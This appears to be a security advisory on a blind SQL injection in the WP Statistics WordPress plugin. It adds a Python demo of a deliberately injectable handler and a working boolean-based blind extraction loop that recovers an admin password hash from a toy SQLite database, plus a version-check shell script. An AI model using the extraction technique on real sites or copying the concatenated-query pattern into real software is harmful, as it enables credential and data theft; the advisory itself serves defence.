WP Statistics WordPress Plugin Vulnerable to Unauthenticated Blind SQL Injection
![](https://www.tenable.com/sites/default/files/images/articles/Tenable_Research_RapidResponse_Medium_38.jpg)
A popular WordPress plugin with over half a million installations is potentially vulnerable to unauthenticated blind SQL injection attacks.
Background
On July 1, maintainers of WP Statistics, a popular WordPress plugin for gathering website statistics about visitor data that boasts over 500,000 active installations, released an update to address a serious vulnerability.
Analysis
Researcher Thomas Chauchefoin discovered and reported an unauthenticated blind SQL injection (SQLi) in the WP Statistics plugin versions 12.6.6.1 and lower. The vulnerability exists in a non-default configuration of the plugin. By default, the Cache Plugin setting in WP Statistics is disabled.
However, when this setting is enabled, an unauthenticated remote attacker could inject SQL through the WP Statistics API endpoint. The injection is blind: the query's output is not returned to the attacker, so data must be inferred from the application's behavior (for example, whether a request succeeds or how long it takes). Since the injection affects both SELECT and UPDATE queries, it could potentially be abused to perform a variety of actions, including changing the administrator credentials, adding another administrator account to the vulnerable WordPress site, exfiltrating user data and more.
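To make the mechanics concrete, the following is an added example, not code from the WP Statistics plugin or from Tenable, and it does not reproduce the real vulnerable endpoint (the page does not give its parameter or query). It uses an in-memory SQLite database with a constructed schema that only echoes WordPress table names, a hypothetical lookup handler that concatenates a request parameter into a SELECT, and a boolean-based blind extraction loop that recovers the admin password hash one character at a time from nothing but a yes/no answer. The hardened form binds the parameter instead, and the same payloads then yield nothing.

```python
import sqlite3
import string

# Constructed stand-in for a WordPress database. The table names echo WordPress
# conventions, but the schema and contents are invented for this example.
ADMIN_HASH = "$P$BexampleHash"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    conn.execute("CREATE TABLE wp_statistics_visitor (ID INTEGER PRIMARY KEY, ip TEXT, hits INTEGER)")
    conn.execute("INSERT INTO wp_statistics_visitor VALUES (1, '203.0.113.5', 3)")
    return conn


def vulnerable_lookup(conn, visitor_id):
    """Hypothetical unauthenticated endpoint: the request parameter is pasted
    straight into the SQL. The caller only learns whether a row came back,
    which is all a blind injection needs."""
    sql = f"SELECT hits FROM wp_statistics_visitor WHERE ID = {visitor_id}"
    return conn.execute(sql).fetchone() is not None


def safe_lookup(conn, visitor_id):
    """Hardened form: the parameter is bound, never concatenated. In WordPress
    the equivalent is $wpdb->prepare() with %d/%s placeholders."""
    sql = "SELECT hits FROM wp_statistics_visitor WHERE ID = ?"
    return conn.execute(sql, (visitor_id,)).fetchone() is not None


def extract_blind(conn, oracle, max_len=64):
    """Boolean-based blind extraction of the admin password hash, one character
    at a time, using only the true/false answer returned by `oracle`."""
    charset = string.ascii_letters + string.digits + "$./"
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in charset:
            # Injected condition: the row is returned only if the guessed
            # character matches substr(user_pass, pos, 1) of the admin row.
            payload = (
                "1 AND (SELECT substr(user_pass, %d, 1) FROM wp_users "
                "WHERE user_login = 'admin') = '%s'" % (pos, ch)
            )
            if oracle(conn, payload):
                hit = ch
                break
        if hit is None:      # substr() past the end returns '', so we are done
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks:", extract_blind(db, vulnerable_lookup))
    print("hardened handler leaks:  ", repr(extract_blind(db, safe_lookup)))
```

The point of the loop is that nothing from the injected subquery is ever displayed; the single bit of "did a row come back" is enough to read any column, which is why an unauthenticated endpoint that merely reflects query success is sufficient for full data exfiltration. With the bound parameter the whole payload is compared as a literal against the integer ID column, matches nothing, and the extraction returns an empty string.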
This isn’t the first SQLi discovered in the WP Statistics plugin. Researchers at Sucuri blogged about their discovery of an SQLi in 2017, and researcher Marcin Probola discovered a blind SQLi in the plugin back in 2015.
Proof of concept
A proof-of-concept (PoC) was shared by the researcher in the WP Vulnerability database posting.
Solution
This vulnerability is addressed in WP Statistics version 12.6.7 or greater. While the vulnerable configuration is not enabled by default, with over half a million active installations it is likely that a large number of WP Statistics users are vulnerable. All users should upgrade to the latest version of the plugin as soon as possible.
Identifying affected systems
A list of Tenable plugins to identify this vulnerability will appear here as they’re released.
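Until scanner coverage is available, a site owner can check the installed plugin version by hand. The following is an added shell example (not Tenable's code and not part of the plugin) that compares a reported version against the 12.6.7 fix release component by component, so that versions such as 12.6.10 are not misjudged by plain string comparison. Reading the version with WP-CLI (`wp plugin get wp-statistics --field=version`, run from the site root) is shown as a commented usage line and is an assumption about the operator's tooling; the page does not name the option key for the Cache Plugin setting, so that check is left to manual inspection of the plugin's settings.

```sh
#!/bin/sh
# Added example: classify a WP Statistics version as affected (< 12.6.7) or not.
# Versions are assumed to be dot-separated numeric components, e.g. 12.6.6.1.

FIXED_VERSION="12.6.7"

# version_lt A B : return 0 (true) if version A is strictly lower than B.
version_lt() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ah=${a%%.*}; bh=${b%%.*}
        case "$a" in *.*) a=${a#*.} ;; *) a="" ;; esac
        case "$b" in *.*) b=${b#*.} ;; *) b="" ;; esac
        ah=${ah:-0}; bh=${bh:-0}          # missing components count as 0
        if [ "$ah" -lt "$bh" ]; then return 0; fi
        if [ "$ah" -gt "$bh" ]; then return 1; fi
    done
    return 1                              # equal versions are not "less than"
}

# is_affected VERSION : true when VERSION predates the fix release.
is_affected() {
    version_lt "$1" "$FIXED_VERSION"
}

# Usage with WP-CLI from the WordPress root (assumed tooling, not run here):
#   ver=$(wp plugin get wp-statistics --field=version)
#   if is_affected "$ver"; then echo "WP Statistics $ver is affected; upgrade"; fi
# Then confirm in the plugin settings whether the Cache Plugin toggle is enabled,
# since only that non-default configuration exposes the injection.

for v in 12.6.6.1 12.6.7 12.6.10; do
    if is_affected "$v"; then echo "$v: affected"; else echo "$v: fixed"; fi
done
```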
Get more information
Join the Tenable Security Response Team on the Tenable Community.
Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.
Get a free 60-day trial of Tenable.io Vulnerability Management.
Related articles
- Threat Intelligence
- Threat Management
- Vulnerability Management
- Vulnerability Scanning